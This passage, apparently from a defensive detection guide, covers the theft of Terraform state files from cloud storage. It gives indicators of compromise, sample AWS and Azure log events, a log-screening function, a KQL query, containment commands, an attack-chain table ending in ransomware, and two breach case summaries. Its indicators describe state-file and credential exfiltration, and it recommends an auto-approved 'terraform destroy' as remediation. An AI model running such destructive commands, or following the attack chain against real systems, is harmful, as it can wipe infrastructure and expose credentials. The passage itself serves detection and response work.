Log IOCs (CloudTrail/Activity Logs):
- GetObject calls to .tfstate files outside normal backup windows
- ListBucket operations from unfamiliar IP addresses or principals
- GetObject requests followed by successful access (reconnaissance → exploitation pattern)
- GetBucketPolicy or GetBucketAcl followed by exfiltration (enumeration → exploitation)
- PutObject to attacker-controlled bucket (state file copy for offline analysis)

Behavioral IOCs:
AWS CloudTrail Event Logs:
{
"eventName": "GetObject",
"eventSource": "s3.amazonaws.com",
"requestParameters": {
"bucketName": "terraform-state-prod",
"key": "production/terraform.tfstate"
},
"sourceIPAddress": "203.0.113.45",
"userAgent": "aws-cli/2.0.0",
"errorCode": null,
"awsRegion": "us-west-2",
"eventTime": "2026-01-09T14:32:15Z",
"recipientAccountId": "123456789012"
}
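A CloudTrail event of this shape can be screened against the Log IOCs above; a minimal sketch (the IP allowlist is illustrative):

```python
def flag_state_access(event: dict, allowed_ips: set) -> bool:
    """Flag GetObject events on .tfstate keys from unexpected source IPs,
    per the Log IOCs listed above."""
    if event.get("eventName") != "GetObject":
        return False
    key = event.get("requestParameters", {}).get("key", "")
    if not key.endswith(".tfstate"):
        return False
    return event.get("sourceIPAddress") not in allowed_ips

# Abbreviated copy of the event shown above.
event = {
    "eventName": "GetObject",
    "eventSource": "s3.amazonaws.com",
    "requestParameters": {"bucketName": "terraform-state-prod",
                          "key": "production/terraform.tfstate"},
    "sourceIPAddress": "203.0.113.45",
}
print(flag_state_access(event, allowed_ips={"10.0.1.5"}))
```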
Azure Activity Log Entries:
{
"operationName": "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"level": "Informational",
"resourceType": "Microsoft.Storage/storageAccounts/blobServices",
"resourceId": "/subscriptions/SUBSCRIPTION_ID/resourceGroups/infrastructure-rg/providers/Microsoft.Storage/storageAccounts/terraformstate123",
"identity": {
"principalId": "00000000-0000-0000-0000-000000000000",
"principalType": "ServicePrincipal"
},
"timeGenerated": "2026-01-09T14:32:15Z"
}
1. Immediate Containment:
- Apply a restrictive bucket policy to cut off access: aws s3api put-bucket-policy --bucket my-terraform-state --policy file://restrictive-policy.json
- Deactivate compromised access keys: aws iam update-access-key --access-key-id AKIA123456789 --status Inactive

2. Forensic Investigation:
- Export CloudTrail logs for analysis: aws s3 sync s3://cloudtrail-logs-terraform/ ./cloudtrail-export/
- Query Azure Activity Logs for storage operations (KQL):
AzureActivity
| where ResourceType == "Microsoft.Storage/storageAccounts"
| where OperationName contains "StorageAccount" or OperationName contains "Blob"
| where TimeGenerated >= ago(90d)
| summarize by bin(TimeGenerated, 1h), OperationName, CallerIpAddress, Identity
- Review state file version history for tampering (aws s3api list-object-versions --bucket my-terraform-state) or Azure Blob soft-delete logs

3. Remediation and Recovery:
- Rebuild compromised infrastructure from a known-good configuration if tampering is confirmed: terraform destroy -auto-approve && terraform apply -auto-approve
- Use terraform show terraform.tfstate | grep -A5 "type" to enumerate modified resources

| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | SUPPLY-CHAIN-001 or IA-EXPLOIT-001 | Compromise DevOps infrastructure via repository access or Azure Application Proxy exploitation |
| 2 | Privilege Escalation | PE-VALID-010 or PE-ACCTMGMT-010 | Escalate from developer to DevOps admin role or Service Principal owner permissions |
| 3 | Current Step | [SUPPLY-CHAIN-009] | Terraform State File Theft – steal credentials and infrastructure metadata |
| 4 | Lateral Movement | LM-AUTH-005 or LM-AUTH-039 | Use stolen credentials (database passwords, storage account keys) to access other systems |
| 5 | Impact | IMPACT-RANSOM-001 or IMPACT-DATA-DESTROY-001 | Deploy ransomware to cloud VMs or destroy data using infrastructure privileges |
Target: European Space Agency (ESA) - 23 member states
Timeline: Approximately 1 week of active exploitation (late December 2025 - early January 2026)
Technique Status: The breach included exfiltration of Terraform files, CI/CD pipelines, API tokens, and hardcoded credentials from the ESA’s development infrastructure. The attacker gained access to Bitbucket repositories and Jira systems through a compromised developer account or credential exposure.
Impact: 200GB of data stolen, including source code, configuration files, and sensitive infrastructure-as-code definitions. The ESA noted concern that this data “could facilitate supply chain attacks or lateral movement into more sensitive networks.”
References:
Target: Organizations running Terraform Enterprise (TFE) on cloud VMs
Timeline: Ongoing; vulnerability disclosed in 2024
Technique Status: By default, Terraform Enterprise does not restrict access to the instance metadata service, allowing Terraform runs to access IAM credentials from the instance role. An attacker who gains code execution in a Terraform run can exfiltrate cloud credentials.
Impact: Lateral movement from Terraform Enterprise into the cloud environment, privilege escalation via instance role assumption, access to additional cloud resources beyond those managed by Terraform.
Reference: Hacking the Cloud: Terraform Enterprise Metadata Service Attack